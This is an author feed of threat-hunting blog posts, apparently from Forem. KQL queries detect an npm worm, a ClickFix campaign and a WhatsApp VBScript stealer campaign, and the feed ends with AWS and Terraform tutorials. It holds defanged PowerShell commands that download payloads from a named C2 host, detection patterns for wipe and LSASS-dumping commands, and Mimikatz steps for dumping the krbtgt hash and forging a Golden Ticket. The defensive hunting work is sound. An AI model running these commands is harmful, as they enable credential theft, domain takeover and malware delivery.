Forem: Puneet Jena

Shai Hulud has resurfaced.

Puneet Jena — Mon, 01 Dec 2025 11:15:29 +0000

Shai-Hulud has been discovered spreading through compromised npm packages. The malware executes hidden installation scripts during dependency installs, steals developer and cloud credentials, and attempts to self-replicate by modifying and republishing packages. In some cases, it includes destructive commands designed to wipe user environments if the malware loses access to its infrastructure.

Monitoring for unexpected installation scripts, suspicious files in node_modules, unusual directories appearing in user home paths, and destructive system commands can help detect early signs of compromise.

Detection Query :

// Detect bun environment payload drop
let EnvFileDrop =
DeviceFileEvents
| where FileName has "bun_environment.js";
// Detect execution of malicious JS stage scripts
let JSStageExec =
DeviceProcessEvents
| where ProcessCommandLine has_any ("setup_bun.js", "bun_environment.js");
// Detect suspicious bun installation pattern using curl / irm / iex
let BunInstallExec =
DeviceProcessEvents
| where FileName in~ ("powershell.exe", "pwsh.exe", "bash", "curl.exe", "curl")
and (
(ProcessCommandLine contains "irm bun.sh/install.ps1" and ProcessCommandLine matches regex @"(iex|invoke-expression)")
or (ProcessCommandLine contains "curl" and ProcessCommandLine contains "bun.sh/install")
);
// Detect secret scanning tool post-compromise
let SecretsScannerExec =
DeviceProcessEvents
| where FileName in~ ("trufflehog.exe", "trufflehog")
| where FolderPath contains ".truffle-cache";
// Detect cleanup or anti-forensic behavior
let CleanupWipeExec =
DeviceProcessEvents
| where (FileName =~ "cmd.exe" and ProcessCommandLine has "%USERPROFILE%"
and (ProcessCommandLine has "del /F /Q /s" or ProcessCommandLine has "cipher /w"))
or (FileName in~ ("bash", "sh") and ProcessCommandLine has "shred -uvz -n 1");
// Union of behavioral signals
union JSStageExec, BunInstallExec, SecretsScannerExec, CleanupWipeExec, EnvFileDrop
| extend DetectionCategory = case(
ProcessCommandLine has_any ("setup_bun.js", "bun_environment.js"), "Initial JS Payload Execution",
ProcessCommandLine has "bun.sh/install", "Suspicious Bun Install",
FileName has "bun_environment.js", "IOC File Drop",
ProcessCommandLine has_any ("shred", "del /F", "cipher /w"), "Cleanup / Wipe Activity",
"Unclassified"
)

Uploads five JSON files to the victim's repository

DeviceFileEvents
| where FileName in~ (
"setup_bun.js",
"bun_environment.js",
"cloud.json",
"contents.json",
"environment.json",
"truffleSecrets.json"
)
| project Timestamp, DeviceName, FileName, FolderPath, SHA256, InitiatingProcessFileName
| order by Timestamp desc

Spawns a detached Bun process running bun_environment.js with POSTINSTALL_BG=1 flag

DeviceProcessEvents
| where ProcessCommandLine contains ".js"
| where ProcessCommandLine contains "POSTINSTALL_BG=1"

Reference :

Hunting TTPs for the EVALUSION ClickFix Campaign Delivering Amatera Stealer & NetSupport RAT

Puneet Jena — Mon, 17 Nov 2025 20:04:38 +0000

While investigating potential exposure to the recently reported EVALUSION ClickFix campaign, which abuses user-interaction-driven execution via the Win + R Run dialog, I focused on identifying suspicious execution patterns aligned with delivery behavior observed in the campaign. This campaign ultimately deploys Amatera Stealer and NetSupport RAT through a .NET-based downloader delivered from public file-sharing platforms.

Kql #1 , Detect suspicious user-initiated execution via the Run dialog (Win + R) where the attacker abuses RunMRU registry key updates to execute payloads such as PowerShell or MSHTA — a core TTP observed in the ClickFix EVALUSION campaign

DeviceRegistryEvents
| where ActionType == "RegistryValueSet"
| where RegistryKey endswith "\Software\Microsoft\Windows\CurrentVersion\Explorer\RunMRU"
and (RegistryValueData has "powershell" or RegistryValueData has "mshta")
and RegistryValueData !~ "mrulist"
and (RegistryValueData contains "http" or RegistryValueData contains "base64" or RegistryValueData matches regex @"(?i)\s-e[nc]{0,3}\s")
| project Process_Creation=Timestamp, DeviceName, InitiatingProcessAccountName,RegistryValueData
| join kind=inner (
DeviceProcessEvents
| where FileName contains "mshta.exe" or FileName contains "powershell.exe"
| project ProcessCreated=Timestamp, DeviceName, InitiatingProcessAccountName, FileName , ProcessCommandLine
)on DeviceName, InitiatingProcessAccountName
| where ProcessCreated between ((Process_Creation - timespan(5sec)) .. (Process_Creation + timespan(5sec)))

//| project Process_Creation, ProcessCreated, DeviceName, InitiatingProcessAccountName, FileName ,ProcessCommandLine

Kql #2 – Suspicious mshta.exe Execution

DeviceProcessEvents
| where FileName =~ "mshta.exe"
| where ProcessCommandLine has_any ("http:", "https:", "://")
| project Timestamp, DeviceName, AccountName, InitiatingProcessAccountName,
FileName, ProcessCommandLine, InitiatingProcessFileName, InitiatingProcessCommandLine

Kql #3 – Detect potentially malicious PowerShell execution

DeviceProcessEvents
| where FileName in~ ("powershell.exe", "pwsh.exe")
| where
ProcessCommandLine has_any (
"-enc", "-encode",
"Invoke-WebRequest",
"curl", "DownloadFile",
"System.Net.HttpWebRequest",
"New-Object Net.WebClient",
"http:", "https:","iwr","iex"
)
or ProcessCommandLine matches regex @"(?i)\s-e[nc]{0,3}\s" // Encoded commands
or ProcessCommandLine matches regex @".(From.*Base64)." // Base64 payload decoding
| project Timestamp, DeviceName, AccountName, InitiatingProcessAccountName,
FileName, ProcessCommandLine, InitiatingProcessFileName, InitiatingProcessCommandLine

Kql #4 – This detection identifies cases where a file is downloaded from MediaFire—a file-hosting platform frequently abused by threat actors—and correlates it with suspicious PowerShell execution occurring within 10 seconds of the download event.

DeviceFileEvents
| where FileOriginUrl contains "mediafire" or FileOriginReferrerUrl contains "mediafire"
| project T1=Timestamp, DeviceName, FileName, FileOriginUrl, FileOriginReferrerUrl
| join kind=inner (
DeviceProcessEvents
| where FileName in~ ("powershell.exe", "pwsh.exe")
| where
ProcessCommandLine has_any (
"-enc", "-encode",
"Invoke-WebRequest",
"curl", "DownloadFile",
"New-Object Net.WebClient",
"http:", "https:","iex","iwr"
)
or ProcessCommandLine matches regex @"(?i)\s-e[nc]{0,3}\s"
or ProcessCommandLine matches regex @".(From.*Base64)."
| project T2=Timestamp, DeviceName, ProcessCommandLine,
InitiatingProcessCommandLine, InitiatingProcessFileName
) on DeviceName
| extend timediff = abs(datetime_diff('second', T1, T2))
| where timediff < 10
| project T1, T2, timediff, DeviceName, FileOriginUrl, FileOriginReferrerUrl,
ProcessCommandLine, InitiatingProcessCommandLine, InitiatingProcessFileName

Validate file Downloads

DeviceFileEvents
| where FileOriginUrl contains "mediafire"

Kql #5 – MSBuild-Spawned PowerShell Download Activity ,
This detection focuses on identifying scenarios where msbuild.exe—commonly abused as a Living-off-the-Land binary—is leveraged through process injection to spawn powershell.exe for the purpose of downloading the NetSupport RAT payload.

DeviceProcessEvents
| where InitiatingProcessFileName =~ "msbuild.exe"
| where FileName in~ ("powershell.exe","pwsh.exe")
| project Timestamp, DeviceName, InitiatingProcessFileName, FileName, ProcessCommandLine, InitiatingProcessCommandLine, AccountName

WhatsApp malware campaign targeting Chrome credential vaults

Puneet Jena — Sun, 16 Nov 2025 21:57:12 +0000

While hunting for malicious PowerShell techniques, we identified anomalous behavior indicative of staged payload execution.

Initial Access & Delivery Chain Summary

Threat actors leveraged WhatsApp as the initial access channel, sending messages to multiple employees within the organization to build trust before sharing a malicious ZIP file. Since ZIP files cannot be opened on mobile devices, users were compelled to access the archive on their endpoints, where they were deceived into executing an embedded VBScript payload.
Execution of the VBScript initiated a multi-stage payload delivery mechanism, where it:
Downloaded a secondary VBScript and an MSI installer from a remote C2 server (varegjopeaks[.]com) and saved them to the temporary directory.
Executed the MSI file silently via msiexec.exe, which dropped an additional VBS script named “installer”.
Created persistence by adding the installer script to the Run registry key.
Downloaded a specific Python environment and executed a PowerShell script that profiled the installed Chrome version and downloaded the official Chrome test automation driver.
Accessed and exfiltrated credentials stored in the Chrome password vault, continuously harvesting newly saved passwords due to the established persistence.

WScript Executions

"wscript.exe" C:\Users*\AppData\Local\Temp\baixa_sscado.vbs
"WScript.exe" C:\Users*\AppData\Local\Temp*.zip.0e6.vbs
"wscript.exe" C:\Users*\AppData\Local\Temp\installer.vbs

PowerShell Download Activity

"powershell.exe" -ep bypass -c "Invoke-WebRequest -Uri 'hxxps://varegjopeaks[.]com/altor/baixa_sscado.vbs' -OutFile $env:TEMP\baixa_sscado.vbs -UseBasicParsing"
"powershell.exe" -ep bypass -c "Invoke-WebRequest -Uri 'hxxps://varegjopeaks[.]com/altor/teste_obscado.vbs' -OutFile $env:TEMP\installer.vbs -UseBasicParsing"
"powershell.exe" -ep bypass -c "Invoke-WebRequest -Uri 'hxxps://varegjopeaks[.]com/altor/installer.msi' -OutFile $env:TEMP\installer.msi -UseBasicParsing"

- Msiexec Execution

"msiexec.exe" /i C:\Users*\AppData\Local\Temp\installer.msi /quiet /norestart

Detection query :

There will be false positives in the results, which must be eliminated through validation and filtering.

DeviceProcessEvents
| where InitiatingProcessFileName contains "wscript"
| where FileName contains "powershell.exe"
| where ProcessCommandLine has_any ("-enc", "-encode", "http", "https", "Invoke-RestMethod", "New-Object Net.WebClient", "System.Net.HttpWebRequest", "DownloadFile", "curl", "wget","iex","iwr")
| distinct ProcessCommandLine,InitiatingProcessCommandLine

.vbs & .msi Execution Identification :

union isfuzzy=true DeviceProcessEvents
| where FileName contains "powershell.exe"
| where ProcessCommandLine has_any ("-enc", "-encode", "http", "https", "Invoke-RestMethod", "New-Object Net.WebClient", "System.Net.HttpWebRequest", "DownloadFile", "curl", "wget","iex","iwr")
| project DeviceName,T1 = Timestamp , ProcessCommandLine , InitiatingProcessCommandLine
| join kind=inner ( DeviceProcessEvents
| where ProcessCommandLine contains "wscript" or ProcessCommandLine contains "msiexec"
| where ProcessCommandLine contains ".msi" or ProcessCommandLine contains ".vbs"
| project DeviceName,T2 = Timestamp , ProcessCommandLine1 = ProcessCommandLine , InitiatingProcessCommandLine1 = InitiatingProcessCommandLine
) on DeviceName
| extend timedifference = abs(datetime_diff('minute', T1, T2))
| where timedifference < 1

Reference :

https://www.joesandbox.com/analysis/1801119/0/html

IOC

36805f82166acf711007ab42e0e4147c10c7639fbf94eac9a1d26401e91a26ea
8041b6cdeb3a4502066d18d024e671577dda23d4a1e4d083f34fcbfa39469279
varegjopeaks[.]com/altor/teste_obscado[.]vbs
varegjopeaks[.]com/altor/baixa_sscado[.]vbs
varegjopeaks[.]com

l

Puneet Jena — Sun, 16 Nov 2025 21:29:33 +0000

voltaj

Puneet Jena — Sun, 16 Nov 2025 19:28:18 +0000

While hunting for suspicious PowerShell commands and scripting interpreter activity, we identified evidence of multi-stage malicious execution involving VBS and PowerShell download cradles, MSI installation, and credential-stealing behavior.

Initial Access & Delivery Chain Summary

Threat actors leveraged WhatsApp as the initial access channel, sending messages to multiple employees within the organization to build trust before sharing a malicious ZIP file. Since ZIP files cannot be opened on mobile devices, users were compelled to access the archive on their endpoints, where they were deceived into executing an embedded VBScript payload.
Execution of the VBScript initiated a multi-stage payload delivery mechanism, where it:
Downloaded a secondary VBScript and an MSI installer from a remote C2 server (varegjopeaks[.]com) and saved them to the temporary directory.
Executed the MSI file silently via msiexec.exe, which dropped an additional VBS script named “installer”.
Created persistence by adding the installer script to the Run registry key.
Downloaded a specific Python environment and executed a PowerShell script that profiled the installed Chrome version and downloaded the official Chrome test automation driver.
Accessed and exfiltrated credentials stored in the Chrome password vault, continuously harvesting newly saved passwords due to the established persistence.

Observed Malicious Execution Activity

WScript Executions

"wscript.exe" C:\Users*\AppData\Local\Temp\baixa_sscado.vbs
"WScript.exe" C:\Users*\AppData\Local\Temp**.zip.0e6*.vbs
"wscript.exe" C:\Users*\AppData\Local\Temp\installer.vbs

PowerShell Download Activity

"powershell.exe" -ep bypass -c "Invoke-WebRequest -Uri 'hxxps://varegjopeaks[.]com/altor/baixa_sscado.vbs' -OutFile $env:TEMP\baixa_sscado.vbs -UseBasicParsing"
"powershell.exe" -ep bypass -c "Invoke-WebRequest -Uri 'hxxps://varegjopeaks[.]com/altor/teste_obscado.vbs' -OutFile $env:TEMP\installer.vbs -UseBasicParsing"
"powershell.exe" -ep bypass -c "Invoke-WebRequest -Uri 'hxxps://varegjopeaks[.]com/altor/installer.msi' -OutFile $env:TEMP\installer.msi -UseBasicParsing"

Msiexec Execution

"msiexec.exe" /i C:\Users*\AppData\Local\Temp\installer.msi /quiet /norestart

WhatsApp malware campaign targeting Chrome credential vaults

Puneet Jena — Sun, 16 Nov 2025 19:28:01 +0000

While hunting for malicious PowerShell techniques, we identified anomalous behavior indicative of staged payload execution.

Initial Access & Delivery Chain Summary

Threat actors leveraged WhatsApp as the initial access channel, sending messages to multiple employees within the organization to build trust before sharing a malicious ZIP file. Since ZIP files cannot be opened on mobile devices, users were compelled to access the archive on their endpoints, where they were deceived into executing an embedded VBScript payload.
Execution of the VBScript initiated a multi-stage payload delivery mechanism, where it:
Downloaded a secondary VBScript and an MSI installer from a remote C2 server (varegjopeaks[.]com) and saved them to the temporary directory.
Executed the MSI file silently via msiexec.exe, which dropped an additional VBS script named “installer”.
Created persistence by adding the installer script to the Run registry key.
Downloaded a specific Python environment and executed a PowerShell script that profiled the installed Chrome version and downloaded the official Chrome test automation driver.
Accessed and exfiltrated credentials stored in the Chrome password vault, continuously harvesting newly saved passwords due to the established persistence.

Observed Malicious Execution Activity

WScript Executions

"wscript.exe" C:\Users*\AppData\Local\Temp\baixa_sscado.vbs
"WScript.exe" C:\Users*\AppData\Local\Temp**.zip.0e6*.vbs
"wscript.exe" C:\Users*\AppData\Local\Temp\installer.vbs

PowerShell Download Activity

"powershell.exe" -ep bypass -c "Invoke-WebRequest -Uri 'hxxps://varegjopeaks[.]com/altor/baixa_sscado.vbs' -OutFile $env:TEMP\baixa_sscado.vbs -UseBasicParsing"
"powershell.exe" -ep bypass -c "Invoke-WebRequest -Uri 'hxxps://varegjopeaks[.]com/altor/teste_obscado.vbs' -OutFile $env:TEMP\installer.vbs -UseBasicParsing"
"powershell.exe" -ep bypass -c "Invoke-WebRequest -Uri 'hxxps://varegjopeaks[.]com/altor/installer.msi' -OutFile $env:TEMP\installer.msi -UseBasicParsing"

Msiexec Execution

"msiexec.exe" /i C:\Users*\AppData\Local\Temp\installer.msi /quiet /norestart

Detection query :

There will be false positives in the results, which must be eliminated through validation and filtering.

.vbs & .msi Execution Identification :

Reference :

https://www.joesandbox.com/analysis/1801119/0/html

IOC

36805f82166acf711007ab42e0e4147c10c7639fbf94eac9a1d26401e91a26ea
8041b6cdeb3a4502066d18d024e671577dda23d4a1e4d083f34fcbfa39469279
varegjopeaks[.]com/altor/teste_obscado[.]vbs
varegjopeaks[.]com/altor/baixa_sscado[.]vbs
varegjopeaks[.]com

Golden Ticket Attack: Forging Kerberos Tickets with Mimikatz

Puneet Jena — Fri, 22 Aug 2025 20:32:06 +0000

A Golden Ticket is a forged Kerberos Ticket Granting Ticket (TGT) generated using the krbtgt account hash from Active Directory. With it, attackers can impersonate any user (even Domain Admins) and access any service in the domain.

Launch Mimikatz .\mimikatz.exe

Enable Debug Privileges privilege::debug

Dump the krbtgt Account Hash lsadump::lsa /inject /name:krbtgt

lsadump::lsa is just one way. Mimikatz provides multiple methods to obtain credentials for Golden Ticket creation, such as:
lsadump::dcsync → Replicates account data directly from a DC.
sekurlsa::logonpasswords → Extracts credentials from LSASS in memory.
sekurlsa::minidump → Loads a dumped LSASS process memory for offline credential extraction.

Create the Golden Ticket kerberos::golden /user:Administrator /domain: /sid: /krbtgt: /id:500

Defender Detection Ideas

https://attack.mitre.org/techniques/T1558/001/

Suspicious LSASS Parent Processes & Commandline :

DeviceProcessEvents
| where FileName contains "lsass.exe"
| summarize count()by InitiatingProcessFileName

DeviceProcessEvents
| where ProcessCommandLine contains "lsass.exe"
| where
// --- Mimikatz module usage ---
ProcessCommandLine has_any ("sekurlsa", "minidump", "lsass.dmp")
// --- ProcDump dumping LSASS ---
or ProcessCommandLine has_any ("procdump", "-ma", "lsass.dmp")
// --- Rundll32 with comsvcs.dll to dump LSASS ---
or ProcessCommandLine has "comsvcs.dll"
// --- PowerShell invoking Mimikatz ---
or ProcessCommandLine has "Invoke-Mimikatz"
| project
Timestamp ,
DeviceName,
FileName,
ProcessCommandLine,
InitiatingProcessAccountName,
InitiatingProcessParentFileName
| order by Timestamp desc

"Unified Agent Installation and Log Monitoring on Amazon EC2 Using CloudWatch: A Step-by-Step Guide"

Puneet Jena — Fri, 13 Oct 2023 18:42:27 +0000

1.Sign in to the AWS Management Console:
2.Log in to your AWS account using your credentials.
3.Launch an EC2 Instance:
4.First of all create required IAM roles for the EC2 instances to be able to send metrics to cloudwatch
In the list of policies while creating IAM Role for EC2 Instance, select the check box next to CloudWatchAgentServerPolicy. Use the search box to find the policy, if necessary.

5.Download the CloudWatch Unified Agent:
wget https://s3.amazonaws.com/amazoncloudwatch-agent/your_os_architecture/latest/amazon-cloudwatch-agent.rpm
6.Install the CloudWatch Agent:
sudo rpm -U ./amazon-cloudwatch-agent.rpm
7.Configure the CloudWatch Agent:
sudo /opt/aws/amazon-cloudwatch-agent/bin/amazon-cloudwatch-agent-config-wizard
8.Start the Agent:
sudo /opt/aws/amazon-cloudwatch-agent/bin/amazon-cloudwatch-agent-ctl -a fetch-config -m ec2 -c file:/opt/aws/amazon-cloudwatch-agent/bin/config.json -s

choose these all options to set-up

Steps

First let’s install and start a web server to generate some web traffic logs. This commmad works for RHEL and Amazon Linux.
sudo yum install httpd -y
sudo service httpd start

Copy the public IP of the instance you’re on and paste that in a web browser and refresh a few times. see a new custom metric in cloud watch

"Building Scalable Cloud Architecture with Terraform: Harnessing VPC Endpoints, VPC Peering, and Load Balancing"

Puneet Jena — Tue, 25 Jul 2023 15:03:30 +0000

In this overview, we will explore the process of architecting a robust and scalable multi-region cloud infrastructure using Amazon Web Services (AWS) and Terraform. We will create two servers in the Mumbai (ap-south-1) region - one private and the other public. Additionally, we will establish an interface endpoint for the private server, set up load balancing for our application, and create a VPC peering connection between the Mumbai VPC and a VPC created in the N. Virginia (us-east-1) region.

Creating a VPC:

- To begin, let's define a VPC in the N. Virginia (us-east-1) region with the CIDR block "11.0.0.0/16". The CIDR block represents the IP address range that the VPC will use for its instances.

Creating a Public Subnet:

Next, we'll create a public subnet within our VPC. A subnet is a segmented range of IP addresses within the VPC. In this case, we'll create a subnet with the CIDR block "11.0.1.0/24" in the availability zone "us-east-1a".

Configuring an Internet Gateway:

- For instances in the public subnet to access the internet, we need an internet gateway. The internet gateway acts as a bridge between the VPC and the internet.

Setting Up a Route Table:

- To control the traffic flow between the subnet and the internet gateway, we need to create a route table and associate it with the public subnet.

Adding a Route to the Internet Gateway:

- Now, we'll add a route in the route table that points all traffic (0.0.0.0/0) to the internet gateway.

Repeat the same process in mumbai region with Peering Connection

** Configuring VPC Peering and edit routes:**

Launching Instances in N. Virginia (us-east-1) AND Mumbai (ap-south-1):
Using Terraform, we can define our instance configuration for the N. Virginia region. This involves specifying the AMI (Amazon Machine Image), instance type, security groups, and other relevant details.

Configuring Security Groups for N. Virginia Instances and Mumbai:
Using Terraform, we'll define the security group rules for instances launched in the N. Virginia region and Mumbai. This involves specifying inbound and outbound rules based on our identified security requirements.

Setting Up Load Balancer:
We'll start by defining an Application Load Balancer (ALB) that can distribute traffic across instances within the N. Mumbai(ap-south-1) region.

Creating Target Groups:
Target groups enable load balancers to direct traffic to specific instances based on defined criteria. We'll create a target group for our instances and configure the health check settings to ensure seamless traffic routing.

Configuring Listener:
The listener defines how the load balancer should route incoming traffic to target groups. We'll configure the listener to accept HTTP requests on a specific port and forward them to the previously created target group.

Defining Security Group Rules for the Load Balancer:
Using Terraform, we'll create a security group specifically designed to protect the load balancer. We'll define rules to allow incoming traffic on the necessary ports (e.g., HTTP) while restricting unauthorized access.

creating endpoint for private server in mumbai

After running the Terraform commands terraform init, terraform plan, and terraform apply, the following outcomes can be expected:

terraform init:

- Initializes the Terraform working directory.
- Downloads the necessary provider plugins and modules specified in the configuration files. terraform plan:
- Generates an execution plan based on the current state and the desired configuration.
- This command performs a "dry run" without actually making any changes to the infrastructure. terraform apply:
- Applies the changes specified in the Terraform configuration to create, update, or delete resources. Connect to N. Virginia Server:

Use an SSH client (e.g., OpenSSH, PuTTY) to connect to your N. Virginia server.

- Obtain the public IP address

Test Connectivity to Private Server in Mumbai:

- From the N. Virginia server, attempt to connect to the private server in the Mumbai region using its private IP address.
- Ensure that the security group rules on both the N. Virginia and Mumbai servers allow the necessary inbound and outbound traffic for communication.
- If the peering connection is correctly configured, you should be able to establish a connection between the servers.
After connecting to N-Virgina server provide key of the private mumbai server using vi keyname then provide required chmod permission ( this process i have missed in screenshot)

we can see that we can successfully connect to private server so the peering connection working properly now lets check the endpoint connection :-

- through endpoint connection, we will try to access s3 buckets

Automating High Availability and Scalability with Terraform Load Balancing in the Cloud"

Puneet Jena — Thu, 20 Jul 2023 19:09:18 +0000

Step 1: Set up the Terraform Project

- Install Terraform: Download and install Terraform on your local machine from the official website: https://www.terraform.io/downloads.html
- Create a directory for your Terraform project.
- Initialize Terraform: Inside the project directory, create a new file named main.tf and add the following code to define the provider:

Step 2: Create the VPC

- create the VPC and subnets in the same main.tf file

Setting up Internet Gateway and Route Table:

- Create a new file named internet_gateway.tf and add the following code to set up the internet gateway and route table:

Configuring Security Groups:

- Create a new file named security_groups.tf and add the following code to configure security groups for the load balancer and instances:

We define a security group alb_sg for the Application Load Balancer (ALB), allowing incoming traffic on port 80 from any source (0.0.0.0/0).

- We create a security group instance_sg for the EC2 instances, allowing incoming traffic on port 80 only from the security group of the ALB. This ensures that the instances can receive traffic from the load balancer while maintaining security.

Generating and Configuring SSH Keys:
Open a terminal on your local machine.

To generate an SSH key pair, run the following command:

- ssh-keygen

Launching EC2 Instancess:

Configuring the Load Balancer,TargetGroup and Listerner:

Result:
After successfully applying the Terraform configuration, you will have a fully functional and highly available web application infrastructure on AWS. Let's take a look at what you've achieved:

Upon refreshing the web application, the ALB distributes incoming requests to registered EC2 instances, ensuring high availability and scalability. Auto Scaling launches additional instances if needed, maintaining smooth traffic distribution.

Title: Step-by-Step Guide: Attaching IAM Roles to an EC2 Instance

Puneet Jena — Sun, 16 Jul 2023 06:46:34 +0000

Introduction:
Attaching IAM (Identity and Access Management) roles to an EC2 (Elastic Compute Cloud) instance in AWS allows you to grant specific permissions and access to resources. This step-by-step guide will walk you through the process of creating a new IAM role, launching an EC2 instance, and attaching the IAM role to the instance. By the end of this guide, you will have successfully attached an IAM role to an EC2 instance and verified its functionality.

Step 1: Create a New IAM Role and Attach IAM ReadOnly Policy:

- Go to the AWS Management Console and navigate to the IAM service.
- Select "Roles" from the left-hand side menu.
- Click on "Create Role" and choose the service that will use the role (in this case, select EC2).
- In the "Permissions" section, search for and select the "ReadOnlyAccess" policy.
- Proceed to configure any optional tags or review the role's settings.
- Give your role a meaningful name, such as "EC2ReadOnlyRole," and provide a description.
- Click on "Create Role" to create the IAM role with the attached IAM ReadOnly policy.

Step 2: Launch an EC2 Instance:

- Go to the EC2 Dashboard in the AWS Management Console.
- Click on "Launch Instances" and follow the wizard to configure your instance, selecting the desired instance type, AMI, and other settings.
- In the "Configure Instance Details" section, scroll down to the "IAM role" field.
- Choose the "EC2ReadOnlyRole" (or the name you provided) from the drop-down menu.
- Continue with the remaining steps of the instance launch wizard, configuring security groups, storage, and other settings as needed.
- Launch the EC2 instance.

Step 3: Attach the IAM Role to the EC2 Instance:

- Once the instance is launched and running, go to the EC2 Dashboard.
- Select the newly created EC2 instance from the list.
- In the "Actions" drop-down menu, choose "Security," and then "Modify IAM Role."
- Select the "EC2ReadOnlyRole" (or the name you provided) from the "IAM role" drop-down menu.
- Click on "Save" to attach the IAM role to the EC2 instance.

Step 4: Connect to the EC2 Instance:

- Obtain the necessary connection details for your EC2 instance, including the public IP address or public DNS name.
- Open a terminal or SSH client and use the appropriate command to connect to the instance. Step 5: Verify IAM Role Functionality:

Once connected to the EC2 instance, execute the following command:
aws iam list-users

This command lists all the IAM users in the AWS account.
If the command successfully returns a list of IAM users, it indicates that the IAM role attached to the EC2 instance has the required IAM ReadOnly permissions. ** Conclusion:** By following the step-by-step guide above, you have successfully created a new IAM role, launched an EC2 instance, attached the IAM role to the instance, and verified the functionality by listing IAM users from the EC2 instance. Attaching IAM roles to EC2 instances provides granular access control and allows instances to interact securely with other AWS services using temporary credentials.

"Optimizing Performance with Load Balancers in Web Applications"

Puneet Jena — Wed, 12 Jul 2023 20:12:05 +0000

I'll guide you step-by-step on how to create three instances, install Apache on each instance, start and enable the Apache server, use the echo command inside /var/www/html to mention the servers, create a target group associated with the three instances, configure an application load balancer, create a security group allowing HTTP traffic, and finally, provide instructions :

Create three instances:

- Launch three instances on your preferred cloud platform (e.g., Amazon EC2, Google Cloud Platform, etc.) using their respective web consoles or APIs.
- Ensure that each instance is running a compatible operating system (e.g., Ubuntu, CentOS, Amazon Linux, etc.).

Install Apache and start the server:

- SSH into each instance using a terminal or SSH client.
- Install Apache by running the appropriate command based on the instance's operating system. For example, on Ubuntu, you can use: Install apache server sudo yum install httpd Start the Apache service: sudo systemctl start httpd Enable Apache on system boot: sudo systemctl enable httpd

Use echo command inside /var/www/html:

- Open the default Apache index file for editing:
- sudo nano /var/www/html/index.html
- Inside the file, use the echo command to display the server's identification. For example:
- <?php echo "This is Server 1"; ?>
- Repeat this step for each server, changing the server number accordingly.

Create a target group:

- Navigate to the load balancing or target group section of your cloud platform.
- Create a new target group and specify the instances you created earlier to associate them with the target group.

Configure an application load balancer:

- In the load balancing section, choose to create a new application load balancer.
- Follow the prompts to configure the load balancer, including selecting the target group you created in the previous step.
- Create a security group allowing HTTP traffic:
- In the security group section of your cloud platform, create a new security group or use an existing one.
- Configure the inbound rules to allow HTTP traffic on port 80. Deny all other inbound traffic unless necessary for your specific requirements.

Attach the target group to the load balancer:

Associate the target group you created with the newly configured application load balancer.

Retrieve the DNS of the load balancer:

- Once the load balancer is created and associated with the target group, find the DNS (or endpoint) of the load balancer in the load balancer settings or properties.
- Test the load balancer:
- Copy the DNS of the load balancer and paste it into a new browser tab.
- Upon refreshing the page, you should see the different server identifications (e.g., "This is Server 1", "This is Server 2", etc.) indicating that the load balancer is functioning properly.